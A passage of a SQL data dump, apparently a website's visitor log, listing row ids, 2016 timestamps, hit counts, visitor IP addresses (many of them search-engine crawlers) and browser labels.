0,0,'164.132.161.45','other'),(69991,1477202701,1,0,1,0,'66.249.64.21',''),(69992,1477203065,1,1,0,0,'51.255.65.85','other'),(69993,1477203581,1,0,1,0,'66.249.64.24',''),(69994,1477203968,1,1,0,0,'66.102.9.25','chrome'),(69995,1477204387,1,1,0,0,'46.211.3.160','chrome'),(69996,1477204810,1,1,0,0,'66.102.9.25','other'),(69997,1477205141,2,0,2,0,'66.249.64.27',''),(69998,1477205185,1,1,0,0,'164.132.161.20','other'),(69999,1477205469,1,0,1,0,'66.249.64.24',''),(70000,1477206171,1,1,0,0,'141.8.183.25','other'),(70001,1477207564,1,1,0,0,'163.172.66.55','other'),(70002,1477207905,2,0,2,0,'66.249.64.24',''),(70003,1477208150,1,0,1,0,'66.249.64.74',''),(70004,1477209215,10,10,0,0,'46.4.120.3','other'),(70005,1477209593,1,1,0,0,'88.252.85.11','other'),(70006,1477209642,1,1,0,0,'164.132.161.70','other'),(70007,1477210030,1,1,0,0,'163.172.64.227','other'),(70008,1477210929,1,1,0,0,'51.255.65.54','other'),(70009,1477211056,1,1,0,0,'164.132.161.66','other'),(70010,1477211364,1,1,0,0,'94.178.3.42','chrome'),(70011,1477211690,1,1,0,0,'51.255.65.50','other'),(70012,1477212154,1,0,1,0,'66.249.64.21',''),(70013,1477212690,1,1,0,0,'164.132.161.68','other'),(70014,1477213346,1,0,1,0,'66.249.64.24',''),(70015,1477213662,1,1,0,0,'66.249.93.15','chrome'),(70016,1477213855,1,1,0,0,'163.172.66.35','other'),(70017,1477214337,1,1,0,0,'204.79.180.255','msie'),(70018,1477214644,2,0,2,0,'66.249.64.27',''),(70019,1477215111,1,1,0,0,'164.132.161.85','other'),(70020,1477215571,1,0,1,0,'66.249.64.27',''),(70021,1477215606,2,0,2,0,'66.249.64.24',''),(70022,1477215806,1,1,0,0,'66.102.9.25','other'),(70023,1477216094,1,1,0,0,'95.135.89.100','chrome'),(70024,1477217432,1,0,1,0,'66.249.64.21',''),(70025,1477218194,1,1,0,0,'164.132.161.9','other'),(70026,1477219222,1,1,0,0,'141.8.142.85','other'),(70027,1477219262,2,1,1,0,'66.249.64.21',''),(70028,1477219462,1,0,1,0,'66.249.64.27',''),(70029,1477219668,1,1,0,0,'163.172.65.106','other'),(70030,1477219981,1,1,0,0,'163.172.64.243','other'),(70031,1477222203,1,0,1,0,'66.249.64.27',''),(70032,1477222437,1,1,0,0,'130.193.37.27','other'),(70033,1477223596,1,1,0,0,'163.172.66.64','other'),(70034,1477223753,1,1,0,0,'163.172.65.7','other'),(70035,1477223789,1,1,0,0,'163.172.64.184','other'),(70036,1477223924,1,1,0,0,'91.196.178.38','firefox'),(70037,1477224299,1,1,0,0,'217.69.133.224','other'),(70038,1477224992,1,1,0,0,'94.179.209.79','firefox'),(70039,1477225043,1,1,0,0,'163.172.66.86','other'),(70040,1477225516,1,1,0,0,'207.46.13.56','other'),(70041,1477225880,1,1,0,0,'164.132.161.76','other'),(70042,1477226168,1,1,0,0,'51.255.65.30','other'),(70043,1477226738,1,1,0,0,'66.249.64.24','chrome'),(70044,1477226787,1,1,0,0,'164.132.161.18','other'),(70045,1477226929,2,2,0,0,'66.249.64.21','chrome'),(70046,1477227293,1,1,0,0,'207.46.13.66','other'),(70047,1477228397,1,1,0,0,'163.172.66.51','other'),(70048,1477228835,1,0,1,0,'66.249.64.21',''),(70049,1477229407,1,1,0,0,'51.255.65.5','other'),(70050,1477229809,1,0,1,0,'66.249.64.24',''),(70051,1477229834,1,1,0,0,'23.92.212.2','chrome'),(70052,1477230364,1,1,0,0,'66.102.9.29','other'),(70053,1477230566,1,1,0,0,'51.255.65.68','other'),(70054,1477232415,1,0,1,0,'66.249.64.24',''),(70055,1477233085,1,1,0,0,'94.180.198.140','msie'),(70056,1477233147,1,1,0,0,'163.172.65.107','other'),(70057,1477233665,2,0,2,0,'66.249.64.24',''),(70058,1477234182,1,1,0,0,'51.255.65.61','other'),(70059,1477234232,1,1,0,0,'51.255.65.38','other'),(70060,1477234562,1,1,0,0,'66.249.64.27','chrome'),(70061,1477234649,1,1,0,0,'51.255.65.4','other'),(70062,1477234958,1,0,1,0,'66.249.64.21',''),(70063,1477234979,1,1,0,0,'37.53.123.139','chrome'),(70064,1477235276,1,1,0,0,'163.172.65.250','other'),(70065,1477235540,1,1,0,0,'163.172.66.28','other'),(70066,1477235545,1,1,0,0,'51.255.65.79','other'),(70067,1477235913,1,1,0,0,'163.172.65.25','other'),(70068,1477235917,1,1,0,0,'51.255.65.6','other'),(70069,1477236160,1,1,0,0,'164.132.161.46','other'),(70070,1477236215,1,1,0,0,'51.255.65.33','other'),(70071,1477236566,1,1,0,0,'164.132.161.15','other'),(70072,1477237208,1,1,0,0,'174.129.237.157','other'),(70073,1477237452,1,1,0,0,'51.255.65.25','other'),(70074,1477237696,1,1,0,0,'163.172.66.150','other'),(70075,1477239526,1,1,0,0,'164.132.161.81','other'),(70076,1477240285,1,1,0,0,'163.172.64.217','other'),(70077,1477240312,1,0,1,0,'66.249.64.21',''),(70078,1477240598,1,0,1,0,'66.249.64.24',''),(70079,1477241022,1,1,0,0,'164.132.161.95','other'),(70080,1477241691,1,1,0,0,'164.132.161.93','other'),(70081,1477242631,1,1,0,0,'217.69.133.169','firefox'),(70082,1477243063,1,1,0,0,'91.196.178.72','firefox'),(70083,1477244635,1,1,0,0,'163.172.66.144','other'),(70084,1477244972,2,0,2,0,'66.249.64.27',''),(70085,1477245999,1,1,0,0,'130.193.50.34','other'),(70086,1477246031,1,1,0,0,'141.8.183.25','other'),(70087,1477246265,1,1,0,0,'207.46.13.66','other'),(70088,1477246917,1,1,0,0,'198.200.97.234','firefox'),(70089,1477247348,1,1,0,0,'163.172.64.222','other'),(70090,1477247379,1,1,0,0,'164.132.161.15','other'),(70091,1477247692,1,1,0,0,'207.46.13.66','other'),(70092,1477247842,1,1,0,0,'93.76.230.172','chrome'),(70093,1477247864,1,1,0,0,'130.193.50.32','other'),(70094,1477248120,1,1,0,0,'163.172.66.80','other'),(70095,1477248431,1,0,1,0,'66.249.64.24',''),(70096,1477248456,1,0,1,0,'66.249.64.21',''),(70097,1477248651,1,1,0,0,'163.172.66.107','other'),(70098,1477248796,1,1,0,0,'163.172.66.93','other'),(70099,1477248970,1,1,0,0,'207.46.13.115','other'),(70100,1477249902,1,1,0,0,'163.172.65.205','other'),(70101,1477251155,2,2,0,0,'141.8.183.25','other'),(70102,1477251526,1,0,1,0,'66.249.64.27',''),(70103,1477252232,1,1,0,0,'94.99.198.108','firefox'),(70104,1477252995,1,1,0,0,'40.77.167.15','other'),(70105,1477253200,1,1,0,0,'164.132.161.11','other'),(70106,1477254552,1,1,0,0,'51.255.65.56','other'),(70107,1477255042,1,1,0,0,'163.172.66.91','other'),(70108,1477255457,1,0,1,0,'66.249.64.27',''),(70109,1477256270,1,1,0,0,'163.172.65.227','other'),(70110,1477257328,1,0,1,0,'66.249.64.21',''),(70111,1477257444,1,0,1,0,'66.249.64.24',''),(70112,1477257576,1,1,0,0,'81.163.124.104','chrome'),(70113,1477258184,1,1,0,0,'180.76.15.29','other'),(70114,1477258549,1,0,1,0,'66.249.64.24',''),(70115,1477258955,1,1,0,0,'163.172.66.72','other'),(70116,1477259204,1,1,0,0,'66.102.9.29','other'),(70117,1477259794,1,0,1,0,'66.249.64.21',''),(70118,1477259795,1,1,0,0,'51.255.65.19','other'),(70119,1477260598,1,1,0,0,'163.172.66.39','other'),(70120,1477260802,2,1,1,0,'66.249.64.24',''),(70121,1477261957,1,1,0,0,'164.132.161.15','other'),(70122,1477262028,2,0,2,0,'66.249.64.27',''),(70123,1477262113,1,1,0,0,'163.172.65.240','other'),(70124,1477263865,1,0,1,0,'66.249.64.74',''),(70125,1477264134,1,1,0,0,'130.193.50.34','other'),(70126,1477265077,1,1,0,0,'164.132.161.65','other'),(70127,1477265392,1,1,0,0,'164.132.161.69','other'),(70128,1477265399,1,0,1,0,'68.180.229.190',''),(70129,1477265480,1,1,0,0,'51.255.65.58','other'),(70130,1477265790,1,1,0,0,'164.132.161.14','other'),(70131,1477266656,1,0,1,0,'66.249.64.27',''),(70132,1477267690,1,1,0,0,'164.132.161.25','other'),(70133,1477267894,1,1,0,0,'46.133.209.79','other'),(70134,1477267942,1,1,0,0,'91.196.178.165','chrome'),(70135,1477268009,1,1,0,0,'2.92.194.72','msie'),(70136,1477268426,1,1,0,0,'51.255.65.72','other'),(70137,1477269073,1,1,0,0,'163.172.64.246','other'),(70138,1477269103,2,0,2,0,'66.249.64.24',''),(70139,1477269114,2,2,0,0,'66.249.64.21','chrome'),(70140,1477269166,1,1,0,0,'217.69.133.221','other'),(70141,1477269226,1,1,0,0,'91.196.178.165','chrome'),(70142,1477269947,1,1,0,0,'66.249.64.24','chrome'),(70143,1477271031,2,2,0,0,'66.249.64.24','chrome'),(70144,1477271053,1,1,0,0,'164.132.161.77','other'),(70145,1477271343,1,1,0,0,'91.196.178.165','chrome'),(70146,1477272452,2,0,2,0,'66.249.64.21',''),(70147,1477272504,1,0,1,0,'66.249.64.27',''),(70148,1477272702,1,0,1,0,'66.249.64.69',''),(70149,1477272961,1,0,1,0,'66.249.64.79',''),(70150,1477273290,1,1,0,0,'91.196.178.165','chrome'),(70151,1477274001,1,1,0,0,'66.102.9.25','other'),(70152,1477274635,1,1,0,0,'141.8.142.58','other'),(70153,1477274705,1,0,1,0,'66.249.64.21',''),(70154,1477274819,1,1,0,0,'91.196.178.165','chrome'),(70155,1477275322,1,1,0,0,'66.249.64.24','chrome'),(70156,1477275414,1,1,0,0,'174.129.237.157','other'),(70157,1477277042,1,1,0,0,'66.102.9.29','other'),(70158,1477279781,1,1,0,0,'163.172.65.248','other'),(70159,1477279789,1,1,0,0,'130.193.51.19','other'),(70160,1477280036,1,1,0,0,'163.172.66.42','other'),(70161,1477280475,2,1,1,0,'62.210.83.88',''),(70162,1477280565,1,1,0,0,'163.172.65.55','other'),(70163,1477280754,1,1,0,0,'66.249.64.24','chrome'),(70164,1477282053,1,0,1,0,'66.249.64.69',''),(70165,1477283054,1,0,1,0,'66.249.64.21',''),(70166,1477283205,1,1,0,0,'66.102.9.27','other'),(70167,1477283221,1,1,0,0,'163.172.64.177','other'),(70168,1477284726,1,0,1,0,'66.249.64.27',''),(70169,1477285126,1,1,0,0,'66.102.9.27','other'),(70170,1477285343,1,1,0,0,'130.193.50.34','other'),(70171,1477285849,1,1,0,0,'91.196.178.68','chrome'),(70172,1477286330,1,1,0,0,'91.196.178.71','firefox'),(70173,1477286809,1,0,1,0,'66.249.64.24',''),(70174,1477288169,1,1,0,0,'91.196.178.72','chrome'),(70175,1477288282,1,1,0,0,'164.132.161.5','other'),(70176,1477288288,1,0,1,0,'66.249.64.79',''),(70177,1477288569,1,1,0,0,'130.193.50.34','other'),(70178,1477288590,1,0,1,0,'66.249.64.27',''),(70179,1477288874,1,1,0,0,'163.172.65.188','other'),(70180,1477288931,1,1,0,0,'94.179.17.101','chrome'),(70181,1477289461,1,1,0,0,'130.180.218.195','firefox'),(70182,1477289635,1,1,0,0,'91.196.178.72','chrome'),(70183,1477289732,1,0,1,0,'66.249.64.27',''),(70184,1477290184,1,1,0,0,'130.180.218.219','chrome'),(70185,1477290506,1,1,0,0,'91.196.178.68','firefox'),(70186,1477290581,1,1,0,0,'91.196.177.110','chrome'),(70187,1477290633,1,1,0,0,'130.193.50.34','other'),(70188,1477290713,1,0,1,0,'66.249.64.27',''),(70189,1477290734,1,0,1,0,'66.249.64.69',''),(70190,1477290773,1,1,0,0,'91.196.178.71','firefox'),(70191,1477291002,1,1,0,0,'91.196.178.72','chrome'),(70192,1477291132,1,0,1,0,'66.249.64.24',''),(70193,1477291212,1,1,0,0,'94.179.8.135','firefox'),(70194,1477291224,2,0,2,0,'66.249.64.21',''),(70195,1477291542,1,1,0,0,'8.37.232.79','other'),(70196,1477291677,1,1,0,0,'207.46.13.66','other'),(70197,1477291750,1,1,0,0,'141.8.183.19','other'),(70198,1477292080,1,1,0,0,'130.193.50.34','other'),(70199,1477292437,1,1,0,0,'164.132.161.26','other'),(70200,1477292574,1,1,0,0,'91.196.178.67','firefox'),(70201,1477292930,1,0,1,0,'66.249.64.79',''),(70202,1477293074,1,1,0,0,'164.132.161.58','other'),(70203,1477293172,2,0,2,0,'66.249.64.27',''),(70204,1477293217,1,1,0,0,'78.111.185.190','firefox'),(70205,1477293318,1,1,0,0,'141.8.183.25','other'),(70206,1477293609,1,0,1,0,'66.249.64.24',''),(70207,1477293972,1,1,0,0,'195.225.144.85','firefox'),(70208,1477293993,1,1,0,0,'207.46.13.167','other'),(70209,1477294099,1,1,0,0,'66.249.93.14','chrome'),(70210,1477294180,1,1,0,0,'180.76.15.6','other'),(70211,1477294439,1,1,0,0,'178.92.39.175','chrome'),(70212,1477294693,1,1,0,0,'130.193.50.34','other'),(70213,1477294903,2,0,2,0,'66.249.64.27',''),(70214,1477295424,1,1,0,0,'174.129.237.157','other'),(70215,1477295657,1,1,0,0,'164.132.161.18','other'),(70216,1477296045,1,1,0,0,'195.64.190.1','msie'),(70217,1477296405,1,1,0,0,'66.102.9.27','other'),(70218,1477296554,1,1,0,0,'92.113.131.62','chrome'),(70219,1477297102,1,0,1,0,'66.249.64.27',''),(70220,1477297208,1,0,1,0,'66.249.64.74',''),(70221,1477297297,1,1,0,0,'207.46.13.66','other'),(70222,1477297843,2,2,0,0,'141.8.183.25','other'),(70223,1477298209,1,0,1,0,'66.249.64.27',''),(70224,1477298411,1,1,0,0,'195.225.144.85','firefox'),(70225,1477298468,1,1,0,0,'164.132.161.96','other'),(70226,1477298537,1,0,1,0,'66.249.64.21',''),(70227,1477298594,1,1,0,0,'91.196.178.72','chrome'),(70228,1477298653,1,1,0,0,'51.255.65.29','other'),(70229,1477299362,1,1,0,0,'66.102.9.27','other'),(70230,1477299617,1,1,0,0,'164.132.161.31','other'),(70231,1477299971,1,1,0,0,'51.255.65.13','other'),(70232,1477299997,1,1,0,0,'207.46.13.31','other'),(70233,1477300054,1,1,0,0,'91.196.177.15','chrome'),(70234,1477300141,1,1,0,0,'66.249.64.21','chrome'),(70235,1477300278,1,1,0,0,'163.172.66.46','other'),(70236,1477300484,1,1,0,0,'51.255.65.6','other'),(70237,1477300692,2,2,0,0,'91.196.178.67','firefox'),(70238,1477300899,1,1,0,0,'163.172.64.254','other'),(70239,1477301387,1,1,0,0,'141.8.183.25','other'),(70240,1477301481,1,1,0,0,'207.46.13.66','other'),(70241,1477301932,1,1,0,0,'164.132.161.75','other'),(70242,1477301967,1,1,0,0,'164.132.161.60','other'),(70243,1477302081,1,1,0,0,'77.52.177.114','chrome'),(70244,1477302120,1,1,0,0,'178.92.91.6','chrome'),(70245,1477302427,1,1,0,0,'101.226.125.111','msie'),(70246,1477302629,1,0,1,0,'66.249.64.21',''),(70247,1477302924,1,1,0,0,'164.132.161.33','other'),(70248,1477303120,1,0,1,0,'66.249.64.24',''),(70249,1477303310,1,1,0,0,'130.193.50.34','other'),(70250,1477303562,1,1,0,0,'77.52.177.114','chrome'),(70251,1477303763,1,1,0,0,'101.226.33.225','msie'),(70252,1477303765,1,1,0,0,'140.207.185.112','msie'),(70253,1477303777,1,1,0,0,'180.153.214.200','msie'),(70254,1477303797,1,1,0,0,'163.172.65.239','other'),(70255,1477303971,1,0,1,0,'66.249.64.27',''),(70256,1477303990,1,1,0,0,'163.172.64.225','other'),(70257,1477304322,1,1,0,0,'66.249.64.24','chrome'),(70258,1477304339,1,1,0,0,'130.193.50.34','other'),(70259,1477304666,1,1,0,0,'164.132.161.12','other'),(70260,1477304771,1,1,0,0,'130.193.51.19','other'),(70261,1477304823,1,0,1,0,'66.249.64.21',''),(70262,1477305359,1,1,0,0,'163.172.64.253','other'),(70263,1477306151,1,0,1,0,'66.249.64.27',''),(70264,1477306231,2,0,2,0,'66.249.64.21',''),(70265,1477306965,1,1,0,0,'207.46.13.124','other'),(70266,1477307151,1,1,0,0,'66.102.9.29','other'),(70267,1477307164,1,1,0,0,'51.255.65.83','other'),(70268,1477307240,1,1,0,0,'46.211.152.21','other'),(70269,1477307526,1,1,0,0,'51.255.65.19','other'),(70270,1477307623,1,1,0,0,'51.255.65.95','other'),(70271,1477307740,1,1,0,0,'5.58.59.239','chrome'),(70272,1477308097,1,1,0,0,'51.255.65.69','other'),(70273,1477308265,1,0,1,0,'66.249.64.123',''),(70274,1477308357,1,1,0,0,'178.95.158.116','chrome'),(70275,1477308515,1,1,0,0,'141.8.142.58','other'),(70276,1477309182,1,0,1,0,'66.249.64.133',''),(70277,1477309378,1,1,0,0,'94.179.209.79','firefox'),(70278,1477309868,1,1,0,0,'163.172.66.88','other'),(70280,1477309901,1,0,1,0,'66.249.64.123',''),(70281,1477309933,1,1,0,0,'164.132.161.42','other'),(70282,1477309947,1,1,0,0,'66.102.9.27','chrome'),(70283,1477311644,1,0,1,0,'66.249.64.138',''),(70284,1477311943,1,1,0,0,'164.132.161.75','other'),(70285,1477312029,1,1,0,0,'91.196.177.46','chrome'),(70286,1477312059,2,2,0,0,'130.193.50.34','other'),(70287,1477312764,1,1,0,0,'207.46.13.124','other'),(70288,1477313005,1,0,1,0,'66.249.64.119',''),(70289,1477313262,1,1,0,0,'66.102.9.29','other'),(70290,1477313309,1,1,0,0,'94.179.209.79','firefox'),(70291,1477313353,1,1,0,0,'66.249.64.115','chrome'),(70292,1477313386,1,1,0,0,'51.255.65.67','other'),(70293,1477313498,1,0,1,0,'66.249.64.123',''),(70294,1477314134,1,1,0,0,'130.180.217.192','chrome'),(70295,1477314159,1,1,0,0,'66.249.64.123','chrome'),(70296,1477314735,1,1,0,0,'178.95.237.86','chrome'),(70297,1477315281,1,0,1,0,'66.249.64.119',''),(70298,1477315596,1,1,0,0,'130.193.50.34','other'),(70299,1477316095,2,2,0,0,'91.196.178.67','firefox'),(70300,1477316231,1,1,0,0,'164.132.161.49','other'),(70301,1477316399,1,1,0,0,'163.172.64.183','other'),(70302,1477316729,1,1,0,0,'51.255.65.61','other'),(70303,1477317640,1,1,0,0,'66.249.64.143','chrome'),(70304,1477317738,1,1,0,0,'51.255.65.30','other'),(70305,1477317837,1,1,0,0,'163.172.66.123','other'),(70306,1477318020,1,1,0,0,'130.180.217.101','opera'),(70307,1477318341,1,1,0,0,'94.179.46.48','firefox'),(70308,1477318749,1,1,0,0,'37.55.226.128','chrome'),(70309,1477319287,1,1,0,0,'130.193.50.34','other'),(70310,1477319291,1,1,0,0,'141.8.183.25','other'),(70311,1477319497,1,1,0,0,'37.53.225.97','firefox'),(70312,1477319664,1,1,0,0,'141.8.142.61','other'),(70313,1477320331,1,1,0,0,'164.132.161.33','other'),(70314,1477320595,1,1,0,0,'51.255.65.93','other'),(70315,1477320907,1,1,0,0,'163.172.66.11','other'),(70316,1477321064,1,1,0,0,'141.8.132.10','other'),(70317,1477321738,1,1,0,0,'163.172.66.40','other'),(70318,1477321767,3,3,0,0,'130.193.50.34','other'),(70319,1477322553,1,1,0,0,'51.255.65.46','other'),(70320,1477322717,1,1,0,0,'93.170.15.82','chrome'),(70321,1477323728,1,1,0,0,'130.193.50.34','other'),(70322,1477323758,2,2,0,0,'141.8.183.25','other'),(70323,1477324528,1,1,0,0,'91.196.178.65','chrome'),(70324,1477325538,1,1,0,0,'141.8.183.25','other'),(70325,1477326087,1,1,0,0,'164.132.161.73','other'),(70326,1477326220,1,1,0,0,'141.8.142.10','other'),(70327,1477326224,1,1,0,0,'93.158.152.84','other'),(70328,1477326990,1,1,0,0,'164.132.161.48','other'),(70329,1477326995,1,1,0,0,'130.193.51.19','other'),(70330,1477327165,2,2,0,0,'130.193.50.34','other'),(70331,1477327275,1,1,0,0,'5.255.253.68','other'),(70332,1477327426,1,1,0,0,'51.255.65.27','other'),(70333,1477327690,1,1,0,0,'66.102.9.27','other'),(70334,1477328001,1,1,0,0,'163.172.66.144','other'),(70335,1477328648,1,1,0,0,'5.255.253.47','other'),(70336,1477329479,1,1,0,0,'178.154.149.10','other'),(70337,1477330251,1,1,0,0,'163.172.64.187','other'),(70338,1477330307,1,1,0,0,'51.255.65.82','other'),(70339,1477330319,1,1,0,0,'141.8.142.67','other'),(70340,1477330323,1,1,0,0,'141.8.142.62','other'),(70341,1477330326,1,1,0,0,'5.255.253.55','other'),(70342,1477330367,1,1,0,0,'130.193.50.34','other'),(70343,1477330418,1,1,0,0,'5.255.253.30','other'),(70344,1477330422,1,1,0,0,'141.8.142.25','other'),(70345,1477330445,1,0,1,0,'66.249.64.21',''),(70346,1477330480,1,1,0,0,'51.255.65.96','other'),(70347,1477331087,1,1,0,0,'174.129.237.157','other'),(70348,1477331387,1,1,0,0,'163.172.66.29','other'),(70349,1477331529,1,1,0,0,'163.172.65.236','other'),(70350,1477331576,1,1,0,0,'163.172.66.78','other'),(70351,1477331701,1,0,1,0,'66.249.64.27',''),(70352,1477332795,2,2,0,0,'130.193.50.34','other'),(70353,1477332929,2,2,0,0,'174.129.237.157','other'),(70354,1477333573,2,2,0,0,'141.8.183.25','other'),(70355,1477333879,1,1,0,0,'141.8.142.58','other'),(70356,1477333946,1,1,0,0,'51.255.65.96','other'),(70357,1477334499,2,2,0,0,'174.129.237.157','other'),(70358,1477334566,1,1,0,0,'180.76.15.152','other'),(70359,1477334618,1,1,0,0,'163.172.65.58','other'),(70360,1477334749,1,1,0,0,'178.137.87.242','firefox'),(70361,1477334838,1,1,0,0,'51.255.65.13','other'),(70362,1477335026,1,1,0,0,'164.132.161.96','other'),(70363,1477335079,1,0,1,0,'66.249.64.21',''),(70364,1477335085,1,1,0,0,'130.193.50.34','other'),(70365,1477335348,1,1,0,0,'163.172.64.241','other'),(70366,1477335499,4,4,0,0,'91.200.12.42','msie'),(70367,1477335718,1,1,0,0,'130.193.51.19','other'),(70368,1477336303,1,1,0,0,'163.172.65.14','other'),(70369,1477336329,2,0,2,0,'66.249.64.24',''),(70370,1477336565,2,2,0,0,'130.193.50.34','other'),(70371,1477336736,1,1,0,0,'141.8.183.25','other'),(70372,1477336783,1,1,0,0,'163.172.64.253','other'),(70373,1477337047,1,1,0,0,'51.255.65.20','other'),(70374,1477337256,1,0,1,0,'68.180.229.190',''),(70375,1477337434,1,1,0,0,'66.249.64.69','chrome'),(70376,1477337470,1,1,0,0,'163.172.66.72','other'),(70377,1477337622,1,1,0,0,'91.196.178.98','chrome'),(70378,1477337630,1,0,1,0,'66.249.64.21',''),(70379,1477337816,1,1,0,0,'164.132.161.26','other'),(70380,1477338110,1,1,0,0,'164.132.161.36','other'),(70381,1477338253,1,1,0,0,'157.55.39.62','other'),(70382,1477338267,1,0,1,0,'66.249.64.27',''),(70383,1477338425,1,1,0,0,'130.193.50.34','other'),(70384,1477338810,1,1,0,0,'91.196.178.98','chrome'),(70385,1477338832,1,0,1,0,'66.249.64.24',''),(70386,1477338936,1,1,0,0,'141.8.183.25','other'),(70387,1477339147,1,1,0,0,'51.255.65.53','other'),(70388,1477339646,1,0,1,0,'66.249.64.27',''),(70389,1477339972,1,1,0,0,'164.132.161.44','other'),(70390,1477340005,1,1,0,0,'130.193.50.34','other'),(70391,1477340010,1,1,0,0,'141.8.183.25','other'),(70392,1477340107,2,0,2,0,'66.249.64.21',''),(70393,1477340438,1,1,0,0,'51.255.65.38','other'),(70394,1477340477,1,1,0,0,'130.193.51.19','other'),(70395,1477340656,1,1,0,0,'164.132.161.85','other'),(70396,1477340696,1,1,0,0,'51.255.65.7','other'),(70397,1477340904,1,1,0,0,'180.76.15.138','other'),(70398,1477340928,1,1,0,0,'141.8.142.58','other'),(70399,1477340970,1,1,0,0,'130.193.50.34','other'),(70400,1477341138,1,1,0,0,'164.132.161.9','other'),(70401,1477341448,1,1,0,0,'51.255.65.29','other'),(70402,1477341496,1,1,0,0,'141.8.183.25','other'),(70403,1477341652,1,0,1,0,'66.249.64.21',''),(70404,1477341718,1,1,0,0,'51.255.65.88','other'),(70405,1477341722,3,0,3,0,'66.249.64.27',''),(70406,1477342006,1,1,0,0,'109.173.51.122','msie'),(70407,1477342033,1,1,0,0,'130.193.51.19','other'),(70408,1477342066,1,1,0,0,'66.102.9.27','other'),(70409,1477342510,2,2,0,0,'141.8.183.25','other'),(70410,1477342549,2,0,2,0,'66.249.64.24',''),(70411,1477343649,6,6,0,0,'130.193.50.34','other'),(70412,1477343855,1,1,0,0,'51.255.65.75','other'),(70413,1477344878,1,1,0,0,'130.193.50.34','other'),(70414,1477344940,2,0,2,0,'66.249.64.24',''),(70415,1477345452,1,1,0,0,'130.193.51.19','other'),(70416,1477345852,3,0,3,0,'66.249.64.27',''),(70417,1477345905,1,1,0,0,'130.193.50.34','other'),(70418,1477346315,1,1,0,0,'141.8.142.25','other'),(70419,1477346318,1,1,0,0,'178.154.189.31','other'),(70420,1477346730,1,1,0,0,'130.193.50.6','other'),(70421,1477346818,1,0,1,0,'66.249.64.79',''),(70422,1477346999,1,1,0,0,'163.172.66.110','other'),(70423,1477347143,1,1,0,0,'141.8.183.19','other'),(70424,1477347181,1,1,0,0,'141.8.142.61','other'),(70425,1477347184,1,1,0,0,'93.158.152.40','other'),(70426,1477347292,1,1,0,0,'163.172.66.94','other'),(70427,1477347451,1,1,0,0,'163.172.66.142','other'),(70428,1477347560,1,1,0,0,'93.158.152.84','other'),(70429,1477347784,1,0,1,0,'66.249.64.24',''),(70430,1477348644,1,1,0,0,'164.132.161.81','other'),(70431,1477349114,1,1,0,0,'66.249.64.24','chrome'),(70432,1477349238,1,1,0,0,'163.172.65.67','other'),(70433,1477349492,4,4,0,0,'141.8.183.25','other'),(70434,1477349508,8,8,0,0,'130.193.51.19','other'),(70435,1477349554,2,2,0,0,'141.8.142.58','other'),(70436,1477349605,9,9,0,0,'130.193.50.34','other'),(70437,1477350236,1,0,1,0,'66.249.64.21',''),(70438,1477350816,1,1,0,0,'163.172.66.95','other'),(70439,1477350842,2,2,0,0,'141.8.183.25','other'),(70440,1477350846,1,1,0,0,'130.193.51.19','other'),(70441,1477350849,3,3,0,0,'130.193.50.34','other'),(70442,1477350875,1,1,0,0,'164.132.161.3','other'),(70443,1477351050,1,1,0,0,'40.77.167.15','other'),(70444,1477351802,2,0,2,0,'66.249.64.24',''),(70445,1477352359,1,1,0,0,'141.8.183.25','other'),(70446,1477353384,3,3,0,0,'141.8.183.25','other'),(70447,1477353425,1,1,0,0,'51.255.65.62','other'),(70448,1477353825,2,2,0,0,'141.8.142.61','other'),(70449,1477354079,1,1,0,0,'130.193.51.19','other'),(70450,1477354201,1,1,0,0,'51.255.65.16','other'),(70451,1477354219,1,1,0,0,'93.158.152.40','other'),(70452,1477354424,1,1,0,0,'163.172.66.137','other'),(70453,1477354457,1,1,0,0,'141.8.183.25','other'),(70454,1477354864,1,0,1,0,'66.249.64.27',''),(70455,1477354898,1,1,0,0,'130.193.50.34','other'),(70456,1477354931,1,1,0,0,'164.132.161.29','other'),(70457,1477355122,1,1,0,0,'51.255.65.50','other'),(70458,1477355853,1,1,0,0,'163.172.66.91','other'),(70459,1477355916,1,1,0,0,'141.8.142.85','other'),(70460,1477355920,1,1,0,0,'93.158.152.51','other'),(70461,1477356268,1,0,1,0,'66.249.64.24',''),(70462,1477356489,1,1,0,0,'66.102.9.25','other'),(70463,1477356515,1,1,0,0,'130.193.50.34','other'),(70464,1477356749,1,1,0,0,'141.8.183.25','other'),(70465,1477357270,1,1,0,0,'130.193.51.19','other'),(70466,1477357343,1,1,0,0,'163.172.65.233','other'),(70467,1477357460,3,3,0,0,'130.193.50.34','other'),(70468,1477357564,1,1,0,0,'141.8.132.30','other'),(70469,1477357686,1,0,1,0,'66.249.64.27',''),(70470,1477357801,1,0,1,0,'66.249.64.24',''),(70471,1477357813,1,1,0,0,'5.255.253.68','other'),(70472,1477358560,2,2,0,0,'141.8.183.25','other'),(70473,1477358617,1,1,0,0,'164.132.161.16','other'),(70474,1477358691,1,1,0,0,'180.76.15.5','other'),(70475,1477359323,3,3,0,0,'130.193.50.34','other'),(70476,1477359521,1,1,0,0,'51.255.65.35','other'),(70477,1477360427,2,2,0,0,'141.8.183.25','other'),(70478,1477360562,1,1,0,0,'163.172.66.3','other'),(70479,1477361044,2,2,0,0,'130.193.50.34','other'),(70480,1477361406,2,2,0,0,'141.8.183.25','other'),(70481,1477361452,1,1,0,0,'164.132.161.11','other'),(70482,1477361686,1,1,0,0,'51.255.65.66','other'),(70483,1477361898,1,0,1,0,'66.249.64.27',''),(70484,1477362265,1,1,0,0,'141.8.142.58','other'),(70485,1477362269,1,0,1,0,'66.249.64.69',''),(70486,1477362567,3,3,0,0,'141.8.183.25','other'),(70487,1477362833,1,1,0,0,'130.193.50.34','other'),(70488,1477363358,1,1,0,0,'163.172.65.195','other'),(70489,1477363627,1,1,0,0,'164.132.161.67','other'),(70490,1477363635,4,4,0,0,'141.8.183.25','other'),(70491,1477363821,3,3,0,0,'130.193.50.34','other'),(70492,1477363892,2,2,0,0,'130.193.51.19','other'),(70493,1477364695,3,3,0,0,'141.8.183.25','other'),(70494,1477364973,3,3,0,0,'130.193.50.34','other'),(70495,1477365968,9,9,0,0,'141.8.183.25','other'),(70496,1477366062,2,2,0,0,'141.8.142.61','other'),(70497,1477366086,10,10,0,0,'130.193.50.34','other'),(70498,1477366155,2,0,2,0,'66.249.64.24',''),(70499,1477366159,1,1,0,0,'141.8.142.58','other'),(70500,1477366190,2,0,2,0,'66.249.64.21',''),(70501,1477366241,1,1,0,0,'130.193.51.19','other'),(70502,1477366727,1,1,0,0,'164.132.161.11','other'),(70503,1477367666,1,1,0,0,'130.193.50.34','other'),(70504,1477367789,1,1,0,0,'51.255.65.86','other'),(70505,1477367956,1,0,1,0,'66.249.64.27',''),(70506,1477368046,1,1,0,0